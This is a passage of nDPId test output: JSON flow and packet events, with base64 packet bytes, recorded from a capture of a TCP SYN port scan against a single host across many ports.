+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":950,"source":"synscan.pcap","alias":"nDPId-test","flow_id":941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":950,"source":"synscan.pcap","alias":"nDPId-test","flow_id":941,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAs65AAADsGIeKsEAAIQA2GNIzTBAXdU4MZAAAAAGACEAAkhwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":951,"source":"synscan.pcap","alias":"nDPId-test","flow_id":942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":951,"source":"synscan.pcap","alias":"nDPId-test","flow_id":942,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsWb4AADEGvbSsEAAIQA2GNIzSF2PdUoMYAAAAAGACCAAZLAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":952,"source":"synscan.pcap","alias":"nDPId-test","flow_id":943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":952,"source":"synscan.pcap","alias":"nDPId-test","flow_id":943,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsQQkAAC4G2WmsEAAIQA2GNIzSJR7dUoMYAAAAAGACDAAHcQAAAgQFtA=="} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":953,"source":"synscan.pcap","alias":"nDPId-test","flow_id":944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":953,"source":"synscan.pcap","alias":"nDPId-test","flow_id":944,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsitoAADAGjZisEAAIQA2GNIzSAAHdUoMYAAAAAGACBAA0jgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":954,"source":"synscan.pcap","alias":"nDPId-test","flow_id":945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":954,"source":"synscan.pcap","alias":"nDPId-test","flow_id":945,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsvtQAADQGVZ6sEAAIQA2GNIzSBBbdUoMYAAAAAGACBAAweQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":955,"source":"synscan.pcap","alias":"nDPId-test","flow_id":946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27715,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":955,"source":"synscan.pcap","alias":"nDPId-test","flow_id":946,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsUaMAADoGvM+sEAAIQA2GNIzSbEPdUoMYAAAAAGACDADASwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":956,"source":"synscan.pcap","alias":"nDPId-test","flow_id":947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":956,"source":"synscan.pcap","alias":"nDPId-test","flow_id":947,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsx6gAADQGTMqsEAAIQA2GNIzSG1rdUoMYAAAAAGACBAAZNQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":957,"source":"synscan.pcap","alias":"nDPId-test","flow_id":948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":28201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":957,"source":"synscan.pcap","alias":"nDPId-test","flow_id":948,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsr\/8AACoGbnOsEAAIQA2GNIzSbindUoMYAAAAAGACDAC+ZQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":958,"source":"synscan.pcap","alias":"nDPId-test","flow_id":949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":958,"source":"synscan.pcap","alias":"nDPId-test","flow_id":949,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAs6kgAACUGOSqsEAAIQA2GNIzSBKLdUoMYAAAAAGACCAAr7QAAAgQFtA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":959,"source":"synscan.pcap","alias":"nDPId-test","flow_id":950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":705,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":959,"source":"synscan.pcap","alias":"nDPId-test","flow_id":950,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/WEAADMGGBGsEAAIQA2GNIzSAsHdUoMYAAAAAGACEAAlzgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":960,"source":"synscan.pcap","alias":"nDPId-test","flow_id":951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":960,"source":"synscan.pcap","alias":"nDPId-test","flow_id":951,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ38AADoGpvOsEAAIQA2GNIzSB9ndUoMYAAAAAGACDAAktgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":961,"source":"synscan.pcap","alias":"nDPId-test","flow_id":952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059957,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64680,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":961,"source":"synscan.pcap","alias":"nDPId-test","flow_id":952,"flow_packet_id":1,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059957,"pkt":"ACYLMQczACWzv5HuCABFAAAs5XcAADsGJ\/usEAAIQA2GNIzS\/KjdUoMYAAAAAGACEAAr5gAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":962,"source":"synscan.pcap","alias":"nDPId-test","flow_id":953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059957,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":962,"source":"synscan.pcap","alias":"nDPId-test","flow_id":953,"flow_packet_id":1,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059957,"pkt":"ACYLMQczACWzv5HuCABFAAAsxY4AADgGSuSsEAAIQA2GNIzSRrXdUoMYAAAAAGACBADt2QAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":963,"source":"synscan.pcap","alias":"nDPId-test","flow_id":954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059957,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49158,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":963,"source":"synscan.pcap","alias":"nDPId-test","flow_id":954,"flow_packet_id":1,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059957,"pkt":"ACYLMQczACWzv5HuCABFAAAsdRAAADYGnWKsEAAIQA2GNIzSwAbdUoMYAAAAAGACDABsiAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":964,"source":"synscan.pcap","alias":"nDPId-test","flow_id":955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059957,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":964,"source":"synscan.pcap","alias":"nDPId-test","flow_id":955,"flow_packet_id":1,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059957,"pkt":"ACYLMQczACWzv5HuCABFAAAsie4AADMGi4SsEAAIQA2GNIzSD4PdUoMYAAAAAGACEAAZDAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":965,"source":"synscan.pcap","alias":"nDPId-test","flow_id":956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059957,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":965,"source":"synscan.pcap","alias":"nDPId-test","flow_id":956,"flow_packet_id":1,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059957,"pkt":"ACYLMQczACWzv5HuCABFAAAsUTQAADcGwD6sEAAIQA2GNIzSGiHdUoMYAAAAAGACEAAObgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":966,"source":"synscan.pcap","alias":"nDPId-test","flow_id":957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":966,"source":"synscan.pcap","alias":"nDPId-test","flow_id":957,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAsHoUAADMG9u2sEAAIQA2GNIzTEcbdU4MZAAAAAGACEAAWxgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":967,"source":"synscan.pcap","alias":"nDPId-test","flow_id":958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5989,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":967,"source":"synscan.pcap","alias":"nDPId-test","flow_id":958,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAs7fQAAC4GLH6sEAAIQA2GNIzTF2XdU4MZAAAAAGACDAAVJwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":968,"source":"synscan.pcap","alias":"nDPId-test","flow_id":959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":968,"source":"synscan.pcap","alias":"nDPId-test","flow_id":959,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAsqdoAADQGapisEAAIQA2GNIzTBEXdU4MZAAAAAGACBAAwRwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":969,"source":"synscan.pcap","alias":"nDPId-test","flow_id":960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":969,"source":"synscan.pcap","alias":"nDPId-test","flow_id":960,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAs5xkAADoGJ1msEAAIQA2GNIzTCindU4MZAAAAAGACDAAiYwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":970,"source":"synscan.pcap","alias":"nDPId-test","flow_id":961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"synscan.pcap","alias":"nDPId-test","flow_id":961,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAsY4kAADIGsumsEAAIQA2GNIzTA+rdU4MZAAAAAGACDAAoogAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":971,"source":"synscan.pcap","alias":"nDPId-test","flow_id":962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":971,"source":"synscan.pcap","alias":"nDPId-test","flow_id":962,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAsMEoAADMG5SisEAAIQA2GNIzTB9TdU4MZAAAAAGACEAAguAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":972,"source":"synscan.pcap","alias":"nDPId-test","flow_id":963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":972,"source":"synscan.pcap","alias":"nDPId-test","flow_id":963,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAs9IQAACgGK+6sEAAIQA2GNIzTAiHdU4MZAAAAAGACBAAyawAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":973,"source":"synscan.pcap","alias":"nDPId-test","flow_id":964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"synscan.pcap","alias":"nDPId-test","flow_id":964,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAsPqUAACkG4M2sEAAIQA2GNIzTBBvdU4MZAAAAAGACCAAscQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":974,"source":"synscan.pcap","alias":"nDPId-test","flow_id":965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3659,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 